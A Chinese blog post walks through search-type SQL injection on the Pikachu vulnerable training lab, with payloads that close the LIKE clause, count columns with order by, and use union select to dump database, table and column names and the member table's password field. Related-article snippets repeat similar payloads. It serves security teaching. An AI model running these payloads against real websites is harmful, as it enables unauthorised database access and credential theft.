Pikachu搜索型注入

最新推荐文章于 2025-06-07 13:23:05 发布

原创最新推荐文章于 2025-06-07 13:23:05 发布 · 966 阅读

4 ·

本内容遵循CC 4.0 BY-SA版权协议

标签

#数据库 #sql #database

收录于

本文详细介绍了Pikachu搜索型注入的原理和操作步骤。通过构造特定的SQL语句，可以探测数据库信息，包括确定字段数、获取数据库名称、表名以及表中的字段内容。利用闭合技巧和`order by`、`union select`等方法，攻击者能揭示敏感数据。

一、原理

“%”匹配任何字符，“like”的意思就是像，这句SQL的语句就是基于用户输入的pwd在users表中找到相应的password，正常用户当然会输入例如admin,ckse等等。

构造对应的闭合，闭合前面的单引号和百分号，注释后面的百分号和单引号。构造的payload如下

xxxx%’ or 1=1#

二、操作

打开进入界面：

然后我们可以输入’ and 1=1 order by x#通过order by x来确定字段数，时返回了正常页面然后我们可以输入’ and 1=1 order by x#通过order by x来确定字段数

输入’ and 1=1 order by 3#时返回了正常页面

证明字段数为3。
然后输入’ and 1=2 union select 1,2,3#，回显了1、2、3：证明1,2,3都可以回显。
输入’ and 1=2 union select 1,2,(database())#就可以爆出当前使用的数据库pkxss：

输入’ and 1=2 union select 1,2,table_name from information_schema.columns where table_schema=‘pikachu’#，就得到了pikachu数据库下的所有表名

接着随便选一个表，输入’ and 1=2 union select 1,2,column_name from information_schema.columns where table_name=‘member’#，得到member表下的所有字段名：

然后输入’ and 1=2 union select 1,2,pw from pikachu.member#，就得到了字段pw的内容：

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

心动简讯

关注关注

0
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

pikachu之搜索型注入

weixin_43622525的博客

03-07

7244

目录 pikachu 简介搭建 windows Docker SQL注入 搜索型注入 pikachu 简介 Pikachu是一个带有漏洞的Web应用系统，在这里包含了常见的web安全漏洞。如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习，那么Pikachu可能正合你意。搭建 windows 搭建phpstudy环境，将pikachu解压在网站根目录进行搭建。 Docker docker build -t "pikachu" . docker run

参与评论您还未登录，请先登录后发表或查看评论

pikachu靶场之SQL注入

2201_75766364的博客

03-28

1554

程序员在编写web程序时，没有对客户端提交的参数进行严格的过滤和判断。用户可以修改参数或数据，并传递至服务器端，导致服务端拼接了伪造的SQL查询语句，服务端连接数据库，并将伪造的sql语句发送给数据库服务端执行，数据库将sql语句的执行结果，返回给了服务端，服务端又将结果返回给了客户端，从而获取到敏感信息，甚至执行危险的代码或系统命令。简单来说就是：注入产生的原因是接受相关参数未经处理直接带入数据库查询操作。

pikachu sql注入通关手册

tj2718647721的博客

08-07

1480

手动方式：手工构造SQL语句进行注入点发现自动方式：采用自动扫描工具，自动进行注入点发现。

pikachu之特殊注入之搜索型注入、xx型注入、insert/update注入、delete注入、宽字节注入

2301_80661529的博客

03-02

1835

如果一个字符的大小是一个字节的，称为窄字节；如果一个字符的大小是两个字节的，成为宽字节。

Pikachu SQL注入之搜索型注入

SS_liang的博客

01-11

739

无论是搜索型还是字符型，都是需要找到闭合的方式也就是闭合的字符，然后进行sql注入：这里我直接梭哈，原理都一样就没必要再详细说一遍了，前面的文章都有：最后结果就是：这题闭合符号是%'拿下！

pikachu靶场通关笔记20 SQL注入03-搜索型注入(GET)

最新发布

mooyuan的网络安全博客

06-07

1631

本系列为通过《pikachu靶场通关笔记》的SQL注入关卡(共10关）渗透集合，通过对搜索型注入关卡源码的代码审计找到SQL安全风险的真实原因，讲解搜索型注入的原理并进行渗透实践，本文为SQL注入03之搜索型注入关卡的渗透部分。

Pikachu靶场-搜索型注入

2401_83964264的博客

06-01

884

在 SELECT * FROM table WHERE name = '%ko''' 中出现三个单引号是因为：原本的SQL语句中字符串 name 的值是用单引号闭合的，即 '%username%' 的形式。当输入 ko' 时，它被拼接到了SQL语句中，就变成了 '%ko''%' ，这里第一个单引号是原SQL语句中用于开始字符串的，第二个单引号是输入的 ko' 中的单引号，第三个单引号是原SQL语句中用于结束字符串的。此时数据库会因单引号未闭合报错，回显中可能出现 '％（或转义后的符号）。

Pikachu靶场-SQL注入-搜索型注入过关步骤

weixin_44257023的博客

07-21

1236

Pikachu靶场-SQL注入-搜索型注入过关步骤

pikachu闯关（三）---搜索型注入

weixin_75034911的博客

07-13

1574

根据提示信息，可以先随便输入一个，比如：o，得到如下结果：可以猜测出大概sql语句大概是：select username,uid,email from 表名 where username like '%o%'，那么我们要进行注入就要形成闭环可以改为%’形成闭环，相当于成了：select username,uid,email from 表名 where username like '%o%' and 1=1 # %‘，其中 o%' and 1=1 # 这个为我们输入的内容。还是按照之前的步骤进行注入。

pikachu搜索型注入

2301_79595769的博客

12-23

416

判断搜索型注入的方法：1 搜索keywords‘，如果出错的话，有90%的可能性存在漏洞；2 搜索 keywords%，如果同样出错的话，就有95%的可能性存在漏洞；3 搜索keywords% 'and 1=1 and '%'='（这个语句的功能就相当于普通SQL注入的 and 1=1）看返回的情况4 搜索keywords% 'and 1=2 and '%'='（这个语句的功能就相当于普通SQL注入的 and 1=2）看返回的情况5 根据两次的返回情况来判断是不是搜索型文本框注入了。

pikachu靶场--SQL-Inject（搜索型注入）

2401_88387979的博客

12-02

341

数据库名称为：pikachu。

Pickachu第四弹：SQL注入

Pisces_mango的博客

09-03

1621

目录一、数字型注入（post）二、字符型输入（get）三、搜索型注入四、xx型注入五、“insert/update”注入六、“delete”型注入七、“http header”注入八、盲注（base on boolian）九、盲注（base on time）十、宽字节注入十一、手工测试流程十二、报错利用流程一、数字型注入（post）看到输入点后，我们想象一下它在数据库中是怎样操作的，select 字段1，字段2 from 表名 where id=1

Pikachu靶场-SQL注入

sucker的博客

04-21

3782

搜索型SQL注入发生在网站的搜索功能模块中，由于开发者未对用户输入进行有效过滤，导致攻击者可通过构造恶意输入篡改SQL查询逻辑。UPDATE注入发生在应用程序将用户输入直接拼接到UPDATE语句中，允许攻击者修改数据库中的现有数据，可能导致数据篡改、权限提升或信息泄露。SQL注入中的INSERT注入发生在应用程序将用户输入不安全地拼接到INSERT语句中时，允许攻击者操纵数据库操作。是一种需要特定闭合符号的SQL注入类型，其核心在于识别并绕过SQL语句中的闭合符号（如单引号或括号），从而构造恶意查询。

pikachu靶场通关之sql注入

qq_74825121的博客

01-21

4251

pikachu靶场通关之sql注入

SQL注入（pikachu）字符型注入和搜索型注入

weixin_54431413的博客

03-07

1348

注意：前面加上'进行闭合，中间是判断列数的sql语句，后面的注释掉在url中要这么写 1'+union+select+1%2C2%23或者 1'+union+select+1,2--+

网络安全之pikachu搜索型注入实战

weixin_44255593的博客

03-03

1090

实例讲解： 1.搜索型注入漏洞产生的原因：　　在搭建网站的时候为了方便用户搜索该网站中的资源，程序员在写网站脚本的时候加入了搜索功能，但是忽略了对搜索变量的过滤，造成了搜索型注入漏洞，又称文本框注入。 2.搜索型注入的类型：　　同其他注入类型相同，由于提交表单的不同，可分为GET型（多出现于网站上的搜索）和POST型（多出现于用户名的登录搜索匹配），搜索型注入是国内系统中普遍存在的漏洞。 3.原理分析： select username,id,email from member where usern

Pikachu靶场—sql注入通关

oiadkt的博客

03-07

8305

pickchu—sql注入通关

pikachu SQL注入（搜索型）

ANYOUZHEN的博客

05-09

313

观察后端代码，尝试构造合法闭合 payload：xxxx%' or 1=1# 成功注入，#在MySQL数据库中起到注释的作用，可以去掉后面的代码

Pikachu靶场：SQL-Inject之搜索型注入

witwitwiter的博客

04-21

816

Pikachu靶场：SQL-Inject之搜索型注入实验环境以及工具 Firefox浏览器、Burp Suite、Pikachu靶场实验原理 数据库注入漏洞，主要是开发人员在构建代码时，没有对输入边界进行安全考虑，导致攻击着可以通过合法的输入点提交一些精心构造的语句，从而欺骗后台数据库对其进行执行，导致数据库信息泄漏的一种漏洞。实验步骤 1.前期工作先将Proxy中的intercept关闭，使其不进行拦截，让数据通过监听的端口。 2.注入点探测在字符型注入中看到输入框，里面能够输入字符串。这里输